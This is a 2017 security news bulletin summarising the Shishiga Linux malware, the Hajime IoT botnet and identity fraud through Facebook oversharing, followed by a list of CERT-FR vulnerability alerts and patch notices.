Security Bulletin

Security Bulletin #96

  • Text Hover
2017 / 04 / 27

  • Text Hover
  • Text Hover

Linux Shishiga malware, a threat in dangerous evolution


Malware researchers from ESET have discovered a new Linux malware dubbed Linux/Shishiga targeting systems in the wild. The Linux/Shishiga malware uses four different protocols (SSH, Telnet, HTTP and BitTorrent) implements a modular architecture by using Lua scripts. The spreading mechanism behind the Shishiga malware leverage on brute-force attack. Shishiga malware relies on the use of weak, default credentials in its attempts to plant itself on insecure systems through brute-force attacks. The malware uses a built-in password list in the attempt to hack a system. Despite Shishiga has many similarities with other recent malware in abusing weak Telnet and SSH credentials, researchers consider it more sophisticated due to the usage of the BitTorrent protocol and Lua modules. To prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.

  • Text Hover

Hajime Botnet Grows to 300,000 IoT Devices


According to Kaspersky, Hajime, a piece of Internet of Things (IoT) malware that emerged in October 2016, has already ensnared roughly 300,000 devices in a botnet. It simply works by closing some ports to keep the infected devices away from similar threats. Hajime’s author continues to update the code, as recently made changes were seen in the attack module. At the moment, the worm supports three different attack methods: TR-069 exploitation, Telnet default password attack, and Arris cable modem password of the day attack. TR-069 (Technical Report 069) is used by ISPs to manage modems remotely via TCP port 7547 (some devices use port 5555). By abusing the TR-069 NewNTPServer feature, attackers can execute arbitrary commands on vulnerable devices. The authors focused on some specific brands/devices, as the worm uses only specific username-password combinations to brute-force its way into vulnerable devices. Instead of the telnet passwords, the malware uses a specially crafted password of the day when it encounters Arris cable modems. The most intriguing thing about Hajime is its purpose. While the botnet is getting bigger and bigger, partly due to new exploitation modules, its purpose remains unknown. We haven’t seen it being used in any type of attack or malicious activity.

How much are you giving away to fraudsters on Facebook?


How much personal information are you giving fraudsters access to on Facebook? Are you giving them enough information to steal your identity? Deterring fraudsters might not be as simple as just hiding this information in your profile. They can still work out when you were born from the birthday messages posted on your timeline. And even if they don’t know where you live, they could be able to find that out from your name and date of birth. Online directories hold huge quantities of information – from addresses, phone numbers and even a list of your past and present housemates. This can all be pieced together to assume your identity. Armed with these three key pieces of information, fraudsters can obtain fake identification documents such as a replica passports over the internet. Fake documentation then opens the doors to loans, credit cards, mobile phones and more – all taken out in your name.

CERT-FR Weekly News Alert

Current Alerts

CERTFR-2017-ALE-008 : Vulnérabilité dans RDP pour Microsoft Windows XP et Windows Server 2003 (14 avril 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-ALE-008.pdf

CERTFR-2017-ALE-006 : Multiples vulnérabilités dans Siemens RUGGEDCOM ROX I (29 mars 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-ALE-006.pdf

CERTFR-2017-ALE-005 : Vulnérabilité dans les commutateurs Cisco (20 mars 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-ALE-005.pdf

Patches

CERTFR-2017-AVI-131           : Multiples vulnérabilités dans le noyau Linux de SUSE (26 avril 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-131.pdf

CERTFR-2017-AVI-130           : Multiples vulnérabilités dans Adobe ColdFusion (26 avril 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-130.pdf

CERTFR-2017-AVI-129           : Multiples vulnérabilités dans IBM Domino (26 avril 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-129.pdf

CERTFR-2017-AVI-128           : Multiples vulnérabilités dans le noyau Linux d’Ubuntu (25 avril 2017)

Link: http://cert.ssi.gouv.fr/site/CERTFR-2017-AVI-128.pdf